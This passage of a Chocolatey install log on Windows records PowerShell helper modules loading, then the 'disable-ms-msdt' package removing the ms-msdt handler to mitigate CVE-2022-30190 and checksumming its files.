18:36:12,008 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinEnt'.\n2026-06-09 18:36:12,025 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinHome'.\n2026-06-09 18:36:12,025 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinPro'.\n2026-06-09 18:36:12,039 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer'.\n2026-06-09 18:36:12,039 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2008'.\n2026-06-09 18:36:12,055 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2008R2'.\n2026-06-09 18:36:12,055 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2012'.\n2026-06-09 18:36:12,055 
4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2012R2'.\n2026-06-09 18:36:12,072 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2016'.\n2026-06-09 18:36:12,072 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2019'.\n2026-06-09 18:36:12,072 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2022'.\n2026-06-09 18:36:12,087 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerDatacenter'.\n2026-06-09 18:36:12,087 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerEssentials'.\n2026-06-09 18:36:12,087 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerFoundation'.\n2026-06-09 18:36:12,102 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerSBS'.\n2026-06-09 18:36:12,102 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerStandard'.\n2026-06-09 18:36:12,120 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerStorage'.\n2026-06-09 18:36:12,120 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerWeb'.\n2026-06-09 18:36:12,135 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinWorkstation'.\n2026-06-09 18:36:12,135 4968 [INFO ] - VERBOSE: Importing function 'Get-IsXen'.\n2026-06-09 18:36:12,135 4968 [INFO ] - VERBOSE: Importing function 'Get-NuspecInfo'.\n2026-06-09 18:36:12,150 4968 [INFO ] - VERBOSE: Importing function 'Get-PendingReboot'.\n2026-06-09 18:36:12,150 4968 [INFO ] - VERBOSE: Importing function 'Get-WinName'.\n2026-06-09 18:36:12,165 4968 [INFO ] - VERBOSE: Importing function 'Get-WinVerBuild'.\n2026-06-09 18:36:12,165 4968 [INFO ] - VERBOSE: Importing function 'Get-WinVerMajor'.\n2026-06-09 18:36:12,181 4968 [INFO ] - VERBOSE: Importing function 'Get-WinVerMinor'.\n2026-06-09 18:36:12,196 4968 [DEBUG] - Importing 'C:\\ProgramData\\chocolatey\\extensions\\chocolatey-windowsupdate\\chocolatey-windowsupdate.psm1'\n2026-06-09 18:36:12,196 4968 [INFO ] - VERBOSE: Loading module from path 
'C:\\ProgramData\\chocolatey\\extensions\\chocolatey-windowsupdate\\chocolatey-windowsupdate.psm1'.\n2026-06-09 18:36:12,384 4968 [INFO ] - VERBOSE: Exporting function 'Install-WindowsUpdate'.\n2026-06-09 18:36:12,400 4968 [INFO ] - VERBOSE: Exporting function 'Test-WindowsUpdate'.\n2026-06-09 18:36:12,400 4968 [INFO ] - VERBOSE: Importing function 'Install-WindowsUpdate'.\n2026-06-09 18:36:12,400 4968 [INFO ] - VERBOSE: Importing function 'Test-WindowsUpdate'.\n2026-06-09 18:36:12,493 4968 [INFO ] - VERBOSE: Exporting function 'Format-FileSize'.\n2026-06-09 18:36:12,493 4968 [INFO ] - VERBOSE: Exporting function 'Get-ChecksumValid'.\n2026-06-09 18:36:12,510 4968 [INFO ] - VERBOSE: Exporting function 'Get-ChocolateyConfigValue'.\n2026-06-09 18:36:12,510 4968 [INFO ] - VERBOSE: Exporting function 'Get-ChocolateyPath'.\n2026-06-09 18:36:12,510 4968 [INFO ] - VERBOSE: Exporting function 'Get-ChocolateyUnzip'.\n2026-06-09 18:36:12,525 4968 [INFO ] - VERBOSE: Exporting function 'Get-ChocolateyWebFile'.\n2026-06-09 18:36:12,525 4968 [INFO ] - VERBOSE: Exporting function 'Get-FtpFile'.\n2026-06-09 18:36:12,525 4968 [INFO ] - VERBOSE: Exporting function 'Get-OSArchitectureWidth'.\n2026-06-09 18:36:12,541 4968 [INFO ] - VERBOSE: Exporting function 'Get-PackageParameters'.\n2026-06-09 18:36:12,541 4968 [INFO ] - VERBOSE: Exporting function 'Get-PackageParametersBuiltIn'.\n2026-06-09 18:36:12,556 4968 [INFO ] - VERBOSE: Exporting function 'Get-ToolsLocation'.\n2026-06-09 18:36:12,556 4968 [INFO ] - VERBOSE: Exporting function 'Get-UACEnabled'.\n2026-06-09 18:36:12,573 4968 [INFO ] - VERBOSE: Exporting function 'Get-UninstallRegistryKey'.\n2026-06-09 18:36:12,573 4968 [INFO ] - VERBOSE: Exporting function 'Get-VirusCheckValid'.\n2026-06-09 18:36:12,588 4968 [INFO ] - VERBOSE: Exporting function 'Get-WebFile'.\n2026-06-09 18:36:12,603 4968 [INFO ] - VERBOSE: Exporting function 'Get-WebFileName'.\n2026-06-09 18:36:12,621 4968 [INFO ] - VERBOSE: Exporting function 
'Get-WebHeaders'.\n2026-06-09 18:36:12,636 4968 [INFO ] - VERBOSE: Exporting function 'Install-BinFile'.\n2026-06-09 18:36:12,652 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyEnvironmentVariable'.\n2026-06-09 18:36:12,666 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyExplorerMenuItem'.\n2026-06-09 18:36:12,682 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyFileAssociation'.\n2026-06-09 18:36:12,682 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyInstallPackage'.\n2026-06-09 18:36:12,698 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyPackage'.\n2026-06-09 18:36:12,698 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyPinnedTaskBarItem'.\n2026-06-09 18:36:12,713 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyPowershellCommand'.\n2026-06-09 18:36:12,713 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyShortcut'.\n2026-06-09 18:36:12,728 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyVsixPackage'.\n2026-06-09 18:36:12,728 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyZipPackage'.\n2026-06-09 18:36:12,743 4968 [INFO ] - VERBOSE: Exporting function 'Install-Vsix'.\n2026-06-09 18:36:12,743 4968 [INFO ] - VERBOSE: Exporting function 'Set-PowerShellExitCode'.\n2026-06-09 18:36:12,760 4968 [INFO ] - VERBOSE: Exporting function 'Start-ChocolateyProcessAsAdmin'.\n2026-06-09 18:36:12,775 4968 [INFO ] - VERBOSE: Exporting function 'Uninstall-BinFile'.\n2026-06-09 18:36:12,852 4968 [INFO ] - VERBOSE: Exporting function 'Uninstall-ChocolateyEnvironmentVariable'.\n2026-06-09 18:36:12,868 4968 [INFO ] - VERBOSE: Exporting function 'Uninstall-ChocolateyPackage'.\n2026-06-09 18:36:12,868 4968 [INFO ] - VERBOSE: Exporting function 'Uninstall-ChocolateyZipPackage'.\n2026-06-09 18:36:12,896 4968 [INFO ] - VERBOSE: Exporting function 'Write-FunctionCallLogMessage'.\n2026-06-09 18:36:12,899 4968 [INFO ] - VERBOSE: Exporting function 
'Get-Is32'.\n2026-06-09 18:36:12,919 4968 [INFO ] - VERBOSE: Exporting function 'Get-Is64'.\n2026-06-09 18:36:12,930 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsAMDCPU'.\n2026-06-09 18:36:12,930 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsAMDVideo'.\n2026-06-09 18:36:12,930 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsARMCPU'.\n2026-06-09 18:36:12,949 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsHyperV'.\n2026-06-09 18:36:12,949 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsInDomain'.\n2026-06-09 18:36:12,962 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsIntelCPU'.\n2026-06-09 18:36:12,962 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsIntelVideo'.\n2026-06-09 18:36:12,979 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsKVM'.\n2026-06-09 18:36:12,979 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsMobile'.\n2026-06-09 18:36:12,979 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsNvidiaVideo'.\n2026-06-09 18:36:12,993 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsSSD'.\n2026-06-09 18:36:12,993 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsVirtualBox'.\n2026-06-09 18:36:13,010 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsVM'.\n2026-06-09 18:36:13,010 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsVMware'.\n2026-06-09 18:36:13,010 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWin10'.\n2026-06-09 18:36:13,024 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWin11'.\n2026-06-09 18:36:13,024 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWin7'.\n2026-06-09 18:36:13,041 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWin8'.\n2026-06-09 18:36:13,041 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWin80'.\n2026-06-09 18:36:13,056 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWin81'.\n2026-06-09 18:36:13,056 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinEdu'.\n2026-06-09 18:36:13,056 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinEnt'.\n2026-06-09 18:36:13,071 4968 [INFO ] - VERBOSE: Exporting 
function 'Get-IsWinHome'.\n2026-06-09 18:36:13,071 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinPro'.\n2026-06-09 18:36:13,087 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer'.\n2026-06-09 18:36:13,087 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2008'.\n2026-06-09 18:36:13,103 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2008R2'.\n2026-06-09 18:36:13,103 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2012'.\n2026-06-09 18:36:13,118 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2012R2'.\n2026-06-09 18:36:13,118 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2016'.\n2026-06-09 18:36:13,135 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2019'.\n2026-06-09 18:36:13,135 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2022'.\n2026-06-09 18:36:13,150 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerDatacenter'.\n2026-06-09 18:36:13,150 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerEssentials'.\n2026-06-09 18:36:13,150 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerFoundation'.\n2026-06-09 18:36:13,166 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerSBS'.\n2026-06-09 18:36:13,166 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerStandard'.\n2026-06-09 18:36:13,180 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerStorage'.\n2026-06-09 18:36:13,180 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerWeb'.\n2026-06-09 18:36:13,197 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinWorkstation'.\n2026-06-09 18:36:13,197 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsXen'.\n2026-06-09 18:36:13,214 4968 [INFO ] - VERBOSE: Exporting function 'Get-NuspecInfo'.\n2026-06-09 18:36:13,214 4968 [INFO ] - VERBOSE: Exporting function 'Get-PendingReboot'.\n2026-06-09 18:36:13,228 4968 [INFO ] - VERBOSE: Exporting function 'Get-WinName'.\n2026-06-09 18:36:13,228 4968 [INFO ] - VERBOSE: Exporting function 
'Get-WinVerBuild'.\n2026-06-09 18:36:13,228 4968 [INFO ] - VERBOSE: Exporting function 'Get-WinVerMajor'.\n2026-06-09 18:36:13,244 4968 [INFO ] - VERBOSE: Exporting function 'Get-WinVerMinor'.\n2026-06-09 18:36:13,259 4968 [INFO ] - VERBOSE: Exporting function 'Install-WindowsUpdate'.\n2026-06-09 18:36:13,259 4968 [INFO ] - VERBOSE: Exporting function 'Test-WindowsUpdate'.\n2026-06-09 18:36:13,274 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Get-EnvironmentVariable'.\n2026-06-09 18:36:13,274 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Get-EnvironmentVariableNames'.\n2026-06-09 18:36:13,291 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Install-ChocolateyPath'.\n2026-06-09 18:36:13,291 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Set-EnvironmentVariable'.\n2026-06-09 18:36:13,308 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Test-ProcessAdminRights'.\n2026-06-09 18:36:13,322 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Uninstall-ChocolateyPath'.\n2026-06-09 18:36:13,322 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Update-SessionEnvironment'.\n2026-06-09 18:36:13,338 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Get-EnvironmentVariable'.\n2026-06-09 18:36:13,338 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Get-EnvironmentVariableNames'.\n2026-06-09 18:36:13,353 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Install-ChocolateyPath'.\n2026-06-09 18:36:13,353 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Set-EnvironmentVariable'.\n2026-06-09 18:36:13,368 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Test-ProcessAdminRights'.\n2026-06-09 18:36:13,368 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Uninstall-ChocolateyPath'.\n2026-06-09 18:36:13,368 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Update-SessionEnvironment'.\n2026-06-09 18:36:13,384 4968 [INFO ] - VERBOSE: Exporting alias 'Get-ProcessorBits'.\n2026-06-09 18:36:13,384 4968 [INFO ] - VERBOSE: Exporting alias 'Get-OSBitness'.\n2026-06-09 18:36:13,400 4968 [INFO ] - VERBOSE: Exporting alias 'Get-InstallRegistryKey'.\n2026-06-09 18:36:13,400 4968 [INFO ] - VERBOSE: 
Exporting alias 'Generate-BinFile'.\n2026-06-09 18:36:13,417 4968 [INFO ] - VERBOSE: Exporting alias 'Add-BinFile'.\n2026-06-09 18:36:13,417 4968 [INFO ] - VERBOSE: Exporting alias 'Start-ChocolateyProcess'.\n2026-06-09 18:36:13,431 4968 [INFO ] - VERBOSE: Exporting alias 'Invoke-ChocolateyProcess'.\n2026-06-09 18:36:13,431 4968 [INFO ] - VERBOSE: Exporting alias 'Remove-BinFile'.\n2026-06-09 18:36:13,448 4968 [INFO ] - VERBOSE: Exporting alias 'refreshenv'.\n2026-06-09 18:36:13,461 4968 [INFO ] - VERBOSE: Importing cmdlet 'Get-EnvironmentVariable'.\n2026-06-09 18:36:13,461 4968 [INFO ] - VERBOSE: Importing cmdlet 'Get-EnvironmentVariableNames'.\n2026-06-09 18:36:13,477 4968 [INFO ] - VERBOSE: Importing cmdlet 'Install-ChocolateyPath'.\n2026-06-09 18:36:13,477 4968 [INFO ] - VERBOSE: Importing cmdlet 'Set-EnvironmentVariable'.\n2026-06-09 18:36:13,495 4968 [INFO ] - VERBOSE: Importing cmdlet 'Test-ProcessAdminRights'.\n2026-06-09 18:36:13,495 4968 [INFO ] - VERBOSE: Importing cmdlet 'Uninstall-ChocolateyPath'.\n2026-06-09 18:36:13,509 4968 [INFO ] - VERBOSE: Importing cmdlet 'Update-SessionEnvironment'.\n2026-06-09 18:36:13,509 4968 [INFO ] - VERBOSE: Importing function 'Format-FileSize'.\n2026-06-09 18:36:13,525 4968 [INFO ] - VERBOSE: Importing function 'Get-ChecksumValid'.\n2026-06-09 18:36:13,525 4968 [INFO ] - VERBOSE: Importing function 'Get-ChocolateyConfigValue'.\n2026-06-09 18:36:13,525 4968 [INFO ] - VERBOSE: Importing function 'Get-ChocolateyPath'.\n2026-06-09 18:36:13,539 4968 [INFO ] - VERBOSE: Importing function 'Get-ChocolateyUnzip'.\n2026-06-09 18:36:13,539 4968 [INFO ] - VERBOSE: Importing function 'Get-ChocolateyWebFile'.\n2026-06-09 18:36:13,556 4968 [INFO ] - VERBOSE: Importing function 'Get-FtpFile'.\n2026-06-09 18:36:13,556 4968 [INFO ] - VERBOSE: Importing function 'Get-Is32'.\n2026-06-09 18:36:13,556 4968 [INFO ] - VERBOSE: Importing function 'Get-Is64'.\n2026-06-09 18:36:13,572 4968 [INFO ] - VERBOSE: Importing function 
'Get-IsAMDCPU'.\n2026-06-09 18:36:13,572 4968 [INFO ] - VERBOSE: Importing function 'Get-IsAMDVideo'.\n2026-06-09 18:36:13,589 4968 [INFO ] - VERBOSE: Importing function 'Get-IsARMCPU'.\n2026-06-09 18:36:13,589 4968 [INFO ] - VERBOSE: Importing function 'Get-IsHyperV'.\n2026-06-09 18:36:13,602 4968 [INFO ] - VERBOSE: Importing function 'Get-IsInDomain'.\n2026-06-09 18:36:13,602 4968 [INFO ] - VERBOSE: Importing function 'Get-IsIntelCPU'.\n2026-06-09 18:36:13,620 4968 [INFO ] - VERBOSE: Importing function 'Get-IsIntelVideo'.\n2026-06-09 18:36:13,620 4968 [INFO ] - VERBOSE: Importing function 'Get-IsKVM'.\n2026-06-09 18:36:13,633 4968 [INFO ] - VERBOSE: Importing function 'Get-IsMobile'.\n2026-06-09 18:36:13,633 4968 [INFO ] - VERBOSE: Importing function 'Get-IsNvidiaVideo'.\n2026-06-09 18:36:13,649 4968 [INFO ] - VERBOSE: Importing function 'Get-IsSSD'.\n2026-06-09 18:36:13,649 4968 [INFO ] - VERBOSE: Importing function 'Get-IsVirtualBox'.\n2026-06-09 18:36:13,665 4968 [INFO ] - VERBOSE: Importing function 'Get-IsVM'.\n2026-06-09 18:36:13,665 4968 [INFO ] - VERBOSE: Importing function 'Get-IsVMware'.\n2026-06-09 18:36:13,681 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWin10'.\n2026-06-09 18:36:13,681 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWin11'.\n2026-06-09 18:36:13,681 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWin7'.\n2026-06-09 18:36:13,698 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWin8'.\n2026-06-09 18:36:13,698 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWin80'.\n2026-06-09 18:36:13,712 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWin81'.\n2026-06-09 18:36:13,712 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinEdu'.\n2026-06-09 18:36:13,712 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinEnt'.\n2026-06-09 18:36:13,730 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinHome'.\n2026-06-09 18:36:13,744 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinPro'.\n2026-06-09 18:36:13,744 4968 [INFO ] - VERBOSE: 
Importing function 'Get-IsWinServer'.\n2026-06-09 18:36:13,760 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2008'.\n2026-06-09 18:36:13,760 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2008R2'.\n2026-06-09 18:36:13,776 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2012'.\n2026-06-09 18:36:13,776 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2012R2'.\n2026-06-09 18:36:13,790 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2016'.\n2026-06-09 18:36:13,790 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2019'.\n2026-06-09 18:36:13,808 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServer2022'.\n2026-06-09 18:36:13,808 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerDatacenter'.\n2026-06-09 18:36:13,823 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerEssentials'.\n2026-06-09 18:36:13,823 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerFoundation'.\n2026-06-09 18:36:13,837 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerSBS'.\n2026-06-09 18:36:13,837 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerStandard'.\n2026-06-09 18:36:13,852 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerStorage'.\n2026-06-09 18:36:13,852 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinServerWeb'.\n2026-06-09 18:36:13,852 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinWorkstation'.\n2026-06-09 18:36:13,869 4968 [INFO ] - VERBOSE: Importing function 'Get-IsXen'.\n2026-06-09 18:36:13,869 4968 [INFO ] - VERBOSE: Importing function 'Get-NuspecInfo'.\n2026-06-09 18:36:13,886 4968 [INFO ] - VERBOSE: Importing function 'Get-OSArchitectureWidth'.\n2026-06-09 18:36:13,900 4968 [INFO ] - VERBOSE: Importing function 'Get-PackageParameters'.\n2026-06-09 18:36:13,900 4968 [INFO ] - VERBOSE: Importing function 'Get-PackageParametersBuiltIn'.\n2026-06-09 18:36:13,917 4968 [INFO ] - VERBOSE: Importing function 'Get-PendingReboot'.\n2026-06-09 18:36:13,917 
4968 [INFO ] - VERBOSE: Importing function 'Get-ToolsLocation'.\n2026-06-09 18:36:13,931 4968 [INFO ] - VERBOSE: Importing function 'Get-UACEnabled'.\n2026-06-09 18:36:13,931 4968 [INFO ] - VERBOSE: Importing function 'Get-UninstallRegistryKey'.\n2026-06-09 18:36:13,931 4968 [INFO ] - VERBOSE: Importing function 'Get-VirusCheckValid'.\n2026-06-09 18:36:13,947 4968 [INFO ] - VERBOSE: Importing function 'Get-WebFile'.\n2026-06-09 18:36:13,947 4968 [INFO ] - VERBOSE: Importing function 'Get-WebFileName'.\n2026-06-09 18:36:13,962 4968 [INFO ] - VERBOSE: Importing function 'Get-WebHeaders'.\n2026-06-09 18:36:13,962 4968 [INFO ] - VERBOSE: Importing function 'Get-WinName'.\n2026-06-09 18:36:13,978 4968 [INFO ] - VERBOSE: Importing function 'Get-WinVerBuild'.\n2026-06-09 18:36:13,978 4968 [INFO ] - VERBOSE: Importing function 'Get-WinVerMajor'.\n2026-06-09 18:36:13,978 4968 [INFO ] - VERBOSE: Importing function 'Get-WinVerMinor'.\n2026-06-09 18:36:13,993 4968 [INFO ] - VERBOSE: Importing function 'Install-BinFile'.\n2026-06-09 18:36:13,993 4968 [INFO ] - VERBOSE: Importing function 'Install-ChocolateyEnvironmentVariable'.\n2026-06-09 18:36:14,009 4968 [INFO ] - VERBOSE: Importing function 'Install-ChocolateyExplorerMenuItem'.\n2026-06-09 18:36:14,009 4968 [INFO ] - VERBOSE: Importing function 'Install-ChocolateyFileAssociation'.\n2026-06-09 18:36:14,024 4968 [INFO ] - VERBOSE: Importing function 'Install-ChocolateyInstallPackage'.\n2026-06-09 18:36:14,024 4968 [INFO ] - VERBOSE: Importing function 'Install-ChocolateyPackage'.\n2026-06-09 18:36:14,024 4968 [INFO ] - VERBOSE: Importing function 'Install-ChocolateyPinnedTaskBarItem'.\n2026-06-09 18:36:14,024 4968 [INFO ] - VERBOSE: Importing function 'Install-ChocolateyPowershellCommand'.\n2026-06-09 18:36:14,042 4968 [INFO ] - VERBOSE: Importing function 'Install-ChocolateyShortcut'.\n2026-06-09 18:36:14,042 4968 [INFO ] - VERBOSE: Importing function 'Install-ChocolateyVsixPackage'.\n2026-06-09 18:36:14,042 4968 [INFO ] - 
VERBOSE: Importing function 'Install-ChocolateyZipPackage'.\n2026-06-09 18:36:14,058 4968 [INFO ] - VERBOSE: Importing function 'Install-Vsix'.\n2026-06-09 18:36:14,058 4968 [INFO ] - VERBOSE: Importing function 'Install-WindowsUpdate'.\n2026-06-09 18:36:14,058 4968 [INFO ] - VERBOSE: Importing function 'Set-PowerShellExitCode'.\n2026-06-09 18:36:14,073 4968 [INFO ] - VERBOSE: Importing function 'Start-ChocolateyProcessAsAdmin'.\n2026-06-09 18:36:14,073 4968 [INFO ] - VERBOSE: Importing function 'Test-WindowsUpdate'.\n2026-06-09 18:36:14,086 4968 [INFO ] - VERBOSE: Importing function 'Uninstall-BinFile'.\n2026-06-09 18:36:14,086 4968 [INFO ] - VERBOSE: Importing function 'Uninstall-ChocolateyEnvironmentVariable'.\n2026-06-09 18:36:14,103 4968 [INFO ] - VERBOSE: Importing function 'Uninstall-ChocolateyPackage'.\n2026-06-09 18:36:14,103 4968 [INFO ] - VERBOSE: Importing function 'Uninstall-ChocolateyZipPackage'.\n2026-06-09 18:36:14,119 4968 [INFO ] - VERBOSE: Importing function 'Write-FunctionCallLogMessage'.\n2026-06-09 18:36:14,119 4968 [INFO ] - VERBOSE: Importing alias 'Add-BinFile'.\n2026-06-09 18:36:14,119 4968 [INFO ] - VERBOSE: Importing alias 'Generate-BinFile'.\n2026-06-09 18:36:14,134 4968 [INFO ] - VERBOSE: Importing alias 'Get-InstallRegistryKey'.\n2026-06-09 18:36:14,134 4968 [INFO ] - VERBOSE: Importing alias 'Get-OSBitness'.\n2026-06-09 18:36:14,134 4968 [INFO ] - VERBOSE: Importing alias 'Get-ProcessorBits'.\n2026-06-09 18:36:14,150 4968 [INFO ] - VERBOSE: Importing alias 'Invoke-ChocolateyProcess'.\n2026-06-09 18:36:14,150 4968 [INFO ] - VERBOSE: Importing alias 'refreshenv'.\n2026-06-09 18:36:14,227 4968 [INFO ] - VERBOSE: Importing alias 'Remove-BinFile'.\n2026-06-09 18:36:14,227 4968 [INFO ] - VERBOSE: Importing alias 'Start-ChocolateyProcess'.\n2026-06-09 18:36:14,399 4968 [DEBUG] - ---------------------------Script Execution---------------------------\n2026-06-09 18:36:14,445 4968 [DEBUG] - Running 'ChocolateyScriptRunner' for disable-ms-msdt 
v1.0.0 with packageScript 'C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt\\tools\\ChocolateyInstall.ps1', packageFolder:'C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt', installArguments: '', packageParameters: '', preRunHookScripts: '', postRunHookScripts: '',\n2026-06-09 18:36:14,555 4968 [DEBUG] - Running package script 'C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt\\tools\\ChocolateyInstall.ps1'\n2026-06-09 18:36:15,226 4968 [INFO ] - Non-compliant with (CVE-2022-30190) Remove-Item ms-msdt now...\n2026-06-09 18:36:15,258 4968 [INFO ] - Compliant with (CVE-2022-30190)\n2026-06-09 18:36:15,352 4968 [DEBUG] - ----------------------------------------------------------------------\n2026-06-09 18:36:15,367 4968 [DEBUG] - Built-in PowerShell host called with ['[System.Threading.Thread]::CurrentThread.CurrentCulture = '';[System.Threading.Thread]::CurrentThread.CurrentUICulture = '';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::SystemDefault; &amp; import-module -name 'C:\\ProgramData\\chocolatey\\helpers\\chocolateyInstaller.psm1'; &amp; 'C:\\ProgramData\\chocolatey\\helpers\\chocolateyScriptRunner.ps1' -packageScript 'C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt\\tools\\ChocolateyInstall.ps1' -installArguments '' -packageParameters '' -preRunHookScripts $null -postRunHookScripts $null'] exited with '0'.\n2026-06-09 18:36:15,383 4968 [DEBUG] - Calling command ['\"C:\\Windows\\System32\\shutdown.exe\" /a']\n2026-06-09 18:36:15,555 4968 [DEBUG] - Command ['\"C:\\Windows\\System32\\shutdown.exe\" /a'] exited with '1116'\n2026-06-09 18:36:15,587 4968 [DEBUG] - Capturing package files in 'C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt'\n2026-06-09 18:36:15,602 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt\\disable-ms-msdt.nupkg'\n  with checksum '4CC702A61FEC9378C630115B07E6F627'\n2026-06-09 18:36:15,602 4968 [DEBUG] -  Found 
'C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt\\disable-ms-msdt.nuspec'\n  with checksum '684D24B22052135DA170B6044598F834'\n2026-06-09 18:36:15,602 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt\\tools\\backup-ms-msdt.reg'\n  with checksum '500E7E745AAEBC67BE16A511B24CF940'\n2026-06-09 18:36:15,617 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt\\tools\\ChocolateyInstall.ps1'\n  with checksum '904397E10130A2BD49C340A4A8717824'\n2026-06-09 18:36:15,617 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt\\tools\\ChocolateyUninstall.ps1'\n  with checksum '7CDFB5ECBA6740E27035CE20A04A26C6'\n2026-06-09 18:36:15,649 4968 [DEBUG] - Attempting to create directory \"C:\\ProgramData\\chocolatey\\.chocolatey\\disable-ms-msdt.1.0.0\".\n2026-06-09 18:36:15,665 4968 [DEBUG] - There was no original file at 